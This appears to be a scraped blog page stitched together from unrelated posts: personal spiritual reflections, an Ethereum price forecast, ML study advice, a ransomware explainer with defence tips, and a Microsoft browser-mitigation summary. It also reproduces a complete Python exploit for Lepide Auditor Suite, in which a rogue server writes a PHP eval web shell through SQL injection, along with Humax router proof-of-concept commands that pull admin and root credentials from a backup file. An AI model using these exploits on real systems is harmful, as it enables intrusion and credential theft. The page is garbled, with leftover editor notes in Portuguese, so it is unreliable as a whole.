Something, sometimes freaks me out. Sometime, every time, having myself cut out from my own being. So many people around, family, friends and everything else of any meaning turns out to be useless in face of what comes at you. That’s when you feel alone. Completely alone, circumvent and carved out into the middle. All that everyone can do is look at you. The success you’ve made always seems little to suffice the unending torrents of this sharking world and success cannot put a lid to what a heart wants. And, you got nothing to put your back against. It is all lonely here. No one to whom you could peel off your heart, layer by layer, until it feels fulfilling and complete. This is not about a girlfriend, it is just someone who can absorb the burning metal waste that every heart makes living in this nasty world. I look around and see, some people have not much money, not much talented, not very extraordinary, but they got this someone, and I see myself like a deadwood of sorts, living like a machine, and no machine ever lives, it runs. These fellas I envy. I have missed out. Allah up there, this post is for you! I wrote this on my computer, take it as a prayer. You know what I need. Will put it in my DP, I really got some good friends, they may pray for me too.

Wrote the above para last night. I thought that would be it but no. As Ghalib said, “all my paper is used up, and much of the trouble remains / to finish up with me troubles is to voyage a shoreless sea”.

Alright then. Let’s roll.

On the dirt road, towards the depths of hell, there lies at the end the gateway to heaven. We must pass through this dirt road in order to have a glimpse of the gateway. This road is grained with different kinds of people, a thousand situations and a ton of obstacles. All they want is not to let you pass through. Keep you pinned down. Annihilate your resolve. Obliterate your will. It makes you forget who you are. It hardly cares about the toughness in you. What do you do? You must be an extremist of passion. I give up on those who give up on me. I need someone. And if there is none, there’s no need. I am my own champion.

Will add more to this post, since it is a shoreless sea.

Bon voyage.

From a life, that’s full—full of buzzing tasks, full of lulling relations and friends, full of dreams and vacant before goals. Everything is done yet all remains unfinished. In this state of affairs, making the heart skip a beat and using that moment to be unknown again—without a name or an identity. Falling on my back this moment, I see we’re all born the same—unfettered by preconceived limitations. Born free, with a choice to be slaves of ourselves or not. Eventually, to give in to the innate limitations of being blood, flesh and bones—we conform—we live the life of a world which is far lesser than what we are—hollow in the meaning of its traditions—foolish in ethnicities—irrational in its logic—meaningless in what it seeks of us. It doesn’t connect with who we all are and chaos breaks out.  We don’t end the chaos because we can’t —the only way to get out of it is to get out of here—transform—to be what we are, the spirit or the soul. That thing which doesn’t know how to count money but grows fonder of counting stars. The thing that loves that a dog just as one would love one’s own face. The thing that smiles at what makes our bodies angry.

Read the rest of this entry »

 

#!/usr/bin/python
“””
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/

Summary:
========

The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.

Additional code:
================

When I wrote this poc, I didn’t combine the server and client into a single poc. So below is the client-poc.py code:

root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys

if len(sys.argv) < 3:
print “(+) usage: %s <target> <attacker’s server>” % sys.argv[0]
sys.exit(-1)

target = sys.argv[1]
server = sys.argv[2]

s = requests.Session()
print “(+) sending auth bypass”
s.post(‘http://%s:7778/&#8217; % target, data = {‘servername’:server, ‘username’:’whateva’,’password’:’thisisajoke!’,’submit’:”}, allow_redirects=False)
print “(+) sending code execution request”
s.get(‘http://%s:7778/genratereports.php&#8217; % target, params = {‘path’:’lol’,’daterange’:’2@3′,’id’:’6′})

Example:
========

root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016

(+) waiting for the target…
(+) connected by (‘172.16.175.174’, 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by (‘172.16.175.174’, 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 – 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();

In another console:

root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
“””
import struct
import socket
from thread import start_new_thread
import struct

LOGIN = 601
COLUMN = 604
FILENAME = 603

VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = “_SUCCESS_”

def get_string(conn):
size = struct.unpack(“>i”, conn.recv(4))[0]
data = conn.recv(size).decode(“utf-16”)
conn.send(struct.pack(“>i”, VALID))
return data

def send_string(conn, string):
size = len(string.encode(“utf-16-le”))
conn.send(struct.pack(“>i”, size))
conn.send(string.encode(“utf-16-le”))
return struct.unpack(“>i”, conn.recv(4))[0]

def send_tag(conn, tag):
conn.send(struct.pack(“>i”, TAGR))
conn.send(struct.pack(“>i”, tag))
return struct.unpack(“>i”, conn.recv(4))[0]

def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print “(+) successfully sent tag”

# send length of file
conn.send(struct.pack(“>i”, len(filedata.encode(“utf-16-le”))))

# send the malicious payload
conn.send(filedata.encode(“utf-16-le”))
if struct.unpack(“>i”, conn.recv(4))[0] == 2:
print “(+) successfully sent file!”
if send_tag(conn, VALID) == 2:
return True
return False

def client_thread(conn):
“””
Let’s put it this way, my mum’s not proud of my code.
“””
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(“>i”, data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(“>i”, code)[0]

# stage 1
if resp == LOGIN:
print “(+) got a login request”

# send a VALID response back
conn.send(struct.pack(“>i”, VALID))

# now we expect to get the username and password
print “(+) got a username: %s” % get_string(conn)
print “(+) got a password: %s” % get_string(conn)

# now we try to send to send a success packet
print “(+) sending SUCCESS packet”
if send_string(conn, SUCCESS) == 2:
print “(+) send string successful”

# stage 2
elif resp == COLUMN:
print “(+) got a column request”

# send a VALID response back
conn.send(struct.pack(“>i”, VALID))
print “(+) got http request id: %s” % get_string(conn)
print “(+) got http request path: %s” % get_string(conn)
if send_string(conn, “foo-bar”) == 2:
print “(+) send string successful”

# stage 3 – this is where the exploitation is
elif resp == FILENAME:
print “(+) got a filename request”
conn.send(struct.pack(“>i”, VALID))

# now we read back 3 strings…
print “(+) got http request daterange: %s” % get_string(conn)
print “(+) got http request id: %s” % get_string(conn)
print “(+) got http request path: %s” % get_string(conn)

# exploit!
if send_file(conn, “select ‘<?php eval($_GET[e]); ?>’ into outfile ‘../../www/offsec.php’;”):
print “(+) file sent successfully”
print “(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();” % (addr[0])
break
conn.close()

HOST = ‘0.0.0.0’
PORT = 1056

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)

print “Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution”
print “by mr_me 2016\t\n”
print “(+) waiting for the target…”
while True:

# blocking call, waits to accept a connection
conn, addr = s.accept()
print ‘(+) connected by %s’ % addr
start_new_thread(client_thread, (conn,))
s.close()

It’s common for modern browser exploits to attempt to transform a memory safety vulnerability into a method of running arbitrary native code on a target device. This technique is most preferred since it allows the attackers to accomplish their means with least resistance.
Steps to safeguard from Remote Code Execution
Microsoft has been fighting against the problem of web browser vulnerabilities by laying out a systematic approach that aims at eliminating the entire class of vulnerabilities. The first step is to think like a hacker and try to deduce the steps that have been used to exploit the vulnerabilities. This gives more control to us and will also help us shield the attack in a better way. The classes of vulnerability are eliminated by reducing attack surface and by detecting specific mitigation patterns.
Break the Techniques and Contain damage
As we explained earlier in order to combat the attackers one needs to think like a hacker and try to deduce his techniques. That said it is safe to presume that we won’t be able to break all of the techniques and the next step is to contain damage on a device once the vulnerability is exploited.
This time around the tactics can be directed at the attack surface which is accessible from code which is running within Microsoft Edge’s browser sandbox. A Sandbox is a secure environment in which the apps can be tested.
Limit the windows of opportunity
Now, this is sort of a contingency plan considering that all the other methods have failed one needs to limit the window of opportunity for the attackers by using powerful and efficient tools. One can also report the incident at Microsoft Security Response Center and can use other technologies including Windows Defender and SmartScreen which are usually effective in blocking malicious URLs. CIG and ACG together prove to be extremely effective in handling the exploits. What this means is that hackers should now devise new ways which can circumvent the layer of security provided by CIG and ACG.
Arbitrary Code Guard & Code Integrity Guard
Microsoft battles the exploits with ACG (Arbitrary Code Guard) and CIG (Code Integrity Guard) both of which help combat the loading of malicious code into memory. Microsoft Edge is already using the technologies like ACG and CIG to avoid hacking attempts

In case you are a developer, there are many ways in which you can safeguard your code against such exploits. Ensure that your code adheres to the bounds of data buffers and also ensure that you don’t trust the users when it comes to giving out their data. Always try to assume the worst case scenario and build the program such that it can handle it, in other words, it’s always better to be a defensive programmer.

Screen Shot 2017-07-04 at 2.25.15 PM.png

Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6

– Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to provide ADSL internet service to household and small business users. (CHECA ESSA INFO)
To download the backup file it’s not required the use of credentials or any authentication, and the router credentials are stored in plaintext inside the backup.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
——————————————————————————–

– XSS Reflected(CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE BREVEMENTE O QUE A XSS REFLECTED E FALA O QUE PODE FAZER COM O USUARIO USANDO ISSO.
There is XSS reflected on the 404 page.

PoC
http://192.168.0.1alert(‘XSS&#8217;)
——————————————————————————–

– Default credentials to router’s web application not declared in the manual(CVE-2017-7317) NAO ENTENDI ESSA FRASE. QUE QUIS DIZER?
An issue was discovered on Humax Digital HG100 2.0.6 devices.
The attacker can find the root credentials in the backup file.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root

Timeline
2017-03-15 – First contact. Ignored by the vendor.
2017-03-21 – Second contact.
2017-03-22 – The vendor answered asking about the vulnerability.
2017-03-27 – Asked the vendor about his security team contact informarion to report the vulnerability.
2017-03-28 – The vendor answered saying that it is an old product, and they will check this vulnerabilities in the news products.
2017-03-28 – Ask the vendor about a patch.
2017-03-30 – Ask the vendor again about the patch.
2017-04-03 – Notified the vendor about the disclousure after 90 days, even without a patch.
2017-04-19 – Ask the vendor about a patch.
2017-05-08 – Ask the vendor about a patch.
2017-06-29 – Disclosure.

ethereum-price-rise

Ethereum – the cryptocurrency created in 2013 – has been a story of success in the crypto world. Some key events marked its ascendancy. Key technological innovations at the right time consolidated huge competitive advantages when compared to other cryptocurrencies, and in periods of crisis this coin emerged even stronger.

Since the beginning and because of the successive successes of the project, Ethereum has had media coverage that further galvanized public awareness to the coin. Another relevant support came from the financial industry itself when it came to accept Ethereum as a new form of investment.

Major brokerage firms start expanding their offer introducing Ethereum in their platforms. Ethereum trading was born. Also contributing to the emergence of Ethereum was the support of major companies such as Microsoft, Intel or JPMorgan Chase. Finally, governments further legitimized the coin by considering it as a credible instrument of exchange that needs to be regulated.

Ethereum was therefore not only able to introduce technical and technological innovations in a very competitive space but also to create the conditions to, in moment of crisis, emerge stronger. These two factors go hand in hand and are leading to major mutations in the cryptocurrency market.

Because of its achievements Ethereum is challenging the predominant cryptocurrency: Bitcoin. And in our opinion, it will surpass Bitcoin by the end of 2018 – if not sooner.

We will trace this story of success in our infographic. In it we will identify key events that marked the ascendancy of this cryptocurrency. You will also understand why Ethereum is set to overtake Bitcoin by the end of 2018. This isn’t a fact but it’s a clear tendency. And the market itself is supporting this transformation: since the beginning of 2017, and at its peak, Ethereum registered a 5001% growth. Find the reasons why…

ethereum-infographic

No plagiarism here. This article is bot picked from themerkle

All the programming you’d need to perform strictly machine learning related tasks you can learn “on the job”. Programming and thinking like a computer scientists are valuable skills on their own, and I think everyone should introduce themselves to these concepts. Since AI is what you’re shooting for, you shouldn’t spend too much time learning pure CS/programming — there’s so much information in that field that you might get needlessly bogged down trying to master the concepts.
Getting comfortable with a single language is sufficient for now (you can pick up more later easily if necessary) — I recommend Python as it’s the standard tool for machine learning engineers. It’s also the easiest language to learn and is very general.
Codecademy’s Python course will give you a speedy introduction to the language’s syntax, but will do very little for you in terms of CS thinking/problem solving skill development and exposing you to deeper language features. As I said before, since AI is your focus you can learn that stuff as you go.
Right away, you can look into these videos/courses to begin developing a foundation in machine learning concepts. I’d start with Andrew Ng’s Coursera course.
Straight into deep learning.
Great overview of many machine learning topics.
More in-depth and less hands-on neural networks.
Haven’t taken this one yet, but I’m planning on doing so soon.

First up, let’s understand what ransomeware is.

Ransomware is a type of malicious software that blocks access to the victim’s data and threatens to publish or delete it until a ransom is paid. The payment is usually demanded in Bitcoin, since in helps the attacker remain anonymous and there is no chance of a chargeback.

Who can be targeted?

Just about anyone can be targeted. Most of the times intentionally, sometimes unintentionally. It can happen to someone in Kashmir or the United States, organisations or individuals, all are vulnerable.

To Kashmiri internet users it can usually happen by downloading ransomware payloads disguised as free mp3 songs or apk files or other supposedly free stuff. This kind of infection is not targeted in nature, it can well be the handiwork of a script kiddie.

How ransomware works?

That’s a hard question as it varies from one version of ransomeware to another. But all of them follow a basic game plan. I will divide it into 5 phases below:

________________________________________________________________________________

Phase 1: Exploitation and Infection (T –00:00)

In order for an attack to be successful, the malicious ransomware file needs to execute on a computer. This is often done through a phishing email or an exploit kit. In the case of the CryptoLocker malware, the Angler Exploit Kit is a preferred method to gain execution.

Phase 2: Delivery and Execution (T –00:05)

During this phase, the actual ransomware executables are delivered to the victim’s system. Upon execution, persistence mechanisms will be put into place.

Phase 3: Backup Spoliation (T –00:10)

A few seconds later, the ransomware targets the backup files and folders on the victim’s system and removes them to prevent restoring from backup. This is unique to ransomware—other types of crimeware don’t bother to delete backup files.

Phase 4: File Encryption (T –02:00)

Once the backups are completely removed, the malware will perform a secure key exchange with the command and control (C2) server, establishing those encryption keys that will be used on the local system.

Phase 5: User Notification and Cleanup (T –15:00)

With the backup files removed and the encryption dirty work done, the demand instructions for extortion and payment are presented. Quite often, the victim is given a few days to pay. After that time, the ransom increases.

________________________________________________________________________________

Finally, like the Mission Impossible recordings that self destruct, the malware cleans itself off the system so as not to leave behind significant forensic evidence that would help to build better defenses against the malware.

Ransomware attacks are just starting to ramp up. Because these attacks are so lucrative for the perpetrators, they are certain to become more common, more damaging and more expensive.

Your  success in defending against a ransomware attack is largely dependent on your level of preparation and the tools you deploy to monitor your systems to detect, respond to and neutralize suspicious activity.

Now, you have a basic understanding. You can follow the tips below to have a certain degree of defence against ransomware:

1. Back up your data

The single biggest thing that will defeat ransomware is having a regularly updated backup. If you are attacked with ransomware you may lose that document you started earlier this morning, but if you can restore your system to an earlier snapshot or clean up your machine and restore your other lost documents from backup, you can rest easy. Remember that ransomware typically will also encrypt files on drives that are mapped. This includes any external drives such as a USB thumb drive, as well as any network or cloud file stores that you have assigned a drive letter. So, what you need is a regular backup regimen, to an external drive or backup service, one that is not assigned a drive letter or is disconnected when it is not doing backup.

The next three tips are meant to deal with how ransomware has been behaving – this may not be the case forever, but these tips can help increase your overall security in small ways that help prevent against a number of different common malware techniques.

2. Show hidden file-extensions

One way that ransomware frequently arrives is in a file that is named with the extension “.PDF.EXE”, counting on Window’s default behavior of hiding known file-extensions. If you re-enable the ability to see the full file-extension, it can be easier to spot suspicious files.

3. Filter EXEs in email

If your gateway mail scanner has the ability to filter files by extension, you may wish to deny mails sent with “.EXE” files, or to deny mails sent with files that have two file extensions, the last one being executable (“*.*.EXE” files, in filter-speak). If you do legitimately need to exchange executable files within your environment and are denying emails with “.EXE” files, you can do so with ZIP files (password-protected, of course) or via cloud services.

4. Disable files running from AppData/LocalAppData folders

You can create rules within Windows or with Intrusion Prevention Software, to disallow a particular, notable behavior used by ransomware, which is to run its executable from the App Data or Local App Data folders. If (for some reason) you have legitimate software that you know is set to run not from the usual Program Files area but the App Data area, you will need to exclude it from this rule.

5. Use the ransomware Prevention Kit

The ransomware Prevention Kit is a tool created by Third Tier that automates the process of making a Group Policy to disable files running from the App Data and Local App Data folders, as well as disabling executable files from running from the Temp directory of various unzipping utilities. This tool is updated as new techniques are discovered for ransomware, so you will want to check in periodically to make sure you have the latest version. If you need to create exemptions to these rules, they provide this document that explains that process.

6. Disable RDP

The ransomware/Filecoder malware often accesses target machines using Remote Desktop Protocol (RDP), a Windows utility that allows others to access your desktop remotely. If you do not require the use of RDP, you can disable RDP to protect your machine from Filecoder and other RDP exploits. For instructions to do so, visit the appropriate Microsoft Knowledge Base article below:

7. Patch or Update your software

These next two tips are more general malware-related advice, which applies equally to ransomware as to any malware threat. Malware authors frequently rely on people running outdated software with known vulnerabilities, which they can exploit to silently get onto your system. It can significantly decrease the potential for ransomware-pain if you make a practice of updating your software often. Some vendors release security updates on a regular basis (Microsoft and Adobe both use the second Tuesday of the month), but there are often “out-of-band” or unscheduled updates in case of emergency. Enable automatic updates if you can, or go directly to the software vendor’s website, as malware authors like to disguise their creations as software update notifications too.

8. Use a reputable security suite

It is always a good idea to have both anti-malware software and a software firewall to help you identify threats or suspicious behavior. Malware authors frequently send out new variants, to try to avoid detection, so this is why it is important to have both layers of protection. And at this point, most malware relies on remote instructions to carry out their misdeeds. If you run across a ransomware variant that is so new that it gets past anti-malware software, it may still be caught by a firewall when it attempts to connect with its Command and Control (C&C) server to receive instructions for encrypting your files.

If you find yourself in a position where you have already run a ransomware file without having performed any of the previous precautions, your options are quite a bit more limited. But all may not be lost. There are a few things you can do that might help mitigate the damage, particularly if the ransomware in question is ransomware:

9. Disconnect from WiFi or unplug from the network immediately

If you run a file that you suspect may be ransomware, but you have not yet seen the characteristic ransomware screen, if you act very quickly you might be able to stop communication with the C&C server before it finish encrypting your files. If you disconnect yourself from the network immediately (have I stressed enough that this must be done right away?), you might mitigate the damage. It takes some time to encrypt all your files, so you may be able to stop it before it succeeds in garbling them all. This technique is definitely not foolproof, and you might not be sufficiently lucky or be able to move more quickly than the malware, but disconnecting from the network may be better than doing nothing.

10. Use System Restore to get back to a known-clean state

If you have System Restore enabled on your Windows machine, you might be able to take your system back to a known-clean state. But, again, you have to out-smart the malware. Newer versions of ransomware can have the ability to delete “Shadow” files from System Restore, which means those files will not be there when you try to to replace your malware-damaged versions. ransomware will start the deletion process whenever an executable file is run, so you will need to move very quickly as executables may be started as part of an automated process. That is to say, executable files may be run without you knowing, as a normal part of your Windows system’s operation.

11. Set the BIOS clock back

Most ransomware has a payment timer that is generally set to 72 hours, after which time the price for your decryption key goes up significantly. (The price may vary as Bitcoin has a fairly volatile value. At the time of writing the initial price was .5 Bitcoin or $300, which then goes up to 4 Bitcoin) You can “beat the clock” somewhat, by setting the BIOS clock back to a time before the 72 hour window is up. I give this advice reluctantly, as all it can do is keep you from having to pay the higher price, and I strongly advise that you do not pay the ransom. Paying the criminals may get your data back, but there have been plenty of cases where the decryption key never arrived or where it failed to properly decrypt the files. Plus, it encourages criminal behavior! Ransoming anything is not a legitimate business practice, and the malware authors are under no obligation to do as promised – they can take your money and provide nothing in return, because there is no backlash if the criminals fail to deliver.